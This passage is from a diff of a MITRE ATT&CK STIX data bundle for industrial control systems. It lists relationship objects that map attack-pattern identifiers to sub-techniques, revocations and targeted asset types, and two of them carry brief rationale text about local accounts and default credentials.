"relationship--bcfbec44-1ed2-4555-8c60-4dd7452d3a3c", + "created": "2020-03-27T21:30:51.231Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336", + "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bd1dc20c-26f0-41d0-b5f0-d27e2be4b358", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bd29b3ec-5dab-49fe-90ec-37f4c0a3f442", + "created": "2020-10-02T16:59:56.765Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--91177e6d-b616-4a03-ba4b-f3b32f7dda75", + "target_ref": "attack-pattern--55fc4df0-b42c-479a-b860-7a6761bcaad0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bd45c432-b099-433c-97d2-7f152a2dd2fb", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bd716844-74b1-4929-882f-5d85fcd2e836", + "created": "2020-03-09T15:04:32.850Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b", + "target_ref": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bd7509cc-a7e5-4e29-b615-225dfbdd3c4a", + "created": "2023-09-28T21:16:24.310Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:16:24.310Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bd869385-5778-4303-8993-cc6412d12303", + "created": "2023-09-29T18:45:59.108Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:45:59.108Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bd96bcae-941d-404b-8017-38b720a4d56a", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bda2e73a-2b05-4ceb-8b9f-c1e409db4d3d", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bdbc6ca0-7846-42c9-85b5-d539049a9f96", + "created": "2024-06-26T14:52:11.466Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:52:11.466Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bdd4ef01-ea76-445f-b78c-cb311f18d448", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bddc3bac-2cbd-4f5f-8578-9af21eefb4c5", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--be0f7d83-2441-4259-b411-46e0d10566b1", + "created": "2023-10-02T20:23:24.179Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-10-02T20:23:24.179Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", + "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--be2cc8ca-c2cb-4dc6-a3e4-eed9edf4c855", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--be444020-9002-42c3-a68c-1591c0d1e9e2", + "created": "2020-01-30T14:34:45.421Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0", + "target_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--be4cbf2b-7fa0-479d-bf1b-f835e30d054f", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--be61c316-8e31-4133-9276-cce5457adde2", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--22522668-ddf6-470b-a027-9d6866679f67", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--be73800a-3b5f-4659-acda-69ab2267b59d", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--be7e30e2-38f0-49c0-be86-dfc723d9eff0", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--be8cf250-e9ce-41a2-beb8-888795f6fc04", + "created": "2020-02-10T20:49:13.031Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--e2907cea-4b43-4ed7-a570-0fdf0fbeea00", + "target_ref": "attack-pattern--e51137a5-1cdc-499e-911a-abaedaa5ac86", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bea2f900-2b33-4d0a-a1e4-35351566aa37", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bea3b43e-5b72-4309-ad59-de9253dcbba9", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--beafc44c-228f-4a7e-9d92-ac1b16d730e2", + "created": "2023-09-28T20:31:17.116Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:31:17.116Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--beb81712-cdbf-45bf-aa4e-c5d363d12ce3", + "created": "2024-05-22T16:55:58.385Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-22T16:55:58.385Z", + "description": "Asset Mapping Rationale: Adversaries may create a local account to maintain access to victim systems. Local accounts may also be added to network devices, often via common Network Device CLI commands such as username.", + "relationship_type": "targets", + "source_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bed0b5b8-3c9a-4ff0-8cec-ea0bdba4af5c", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--54ca26f3-c172-4231-93e5-ccebcac2161f", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bed9c480-5a8b-4c7b-9eb0-ae1ba74e2f62", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf147104-abf9-4221-95d1-e81585859441", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bede59a9-1963-4774-8265-a5020fd40ec2", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bef2c5c9-99e9-43a5-b4f1-7b95276f85f1", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bf1042a3-cab1-4ccb-9886-b1c5a9d5d6f6", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bf2426b4-aa7c-420a-8bc4-98fb9bab02da", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bf4fe96c-c472-4839-a1bd-61493db4c9a0", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bf517023-967e-44e6-bd6e-81a4f58c23c2", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bf5356b1-d00e-43c3-ba92-ae504a737d76", + "created": "2023-09-29T16:46:12.472Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:46:12.472Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bf5c4cfc-d36b-42e2-b041-fdd5808bec7c", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bf5db180-c472-404a-a669-e556bce4de45", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bf8e68fe-1969-48d1-be0e-ec742378748d", + "created": "2023-09-29T18:56:34.302Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-05-28T03:15:09.186Z", + "description": "Asset Mapping Rationale: Adversaries may leverage manufacturer or supplier set default credentials on control system devices. Default credentials are normally documented in an instruction manual that is either packaged with the device, published online through official means, or published online through unofficial means.", + "relationship_type": "targets", + "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bf8f90a2-4d3a-436d-87d0-eff060fb2302", + "created": "2023-09-29T18:06:02.077Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:06:02.077Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bf9f227c-e306-4257-add1-39c7c2e42040", + "created": "2023-09-29T18:47:28.758Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:47:28.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + 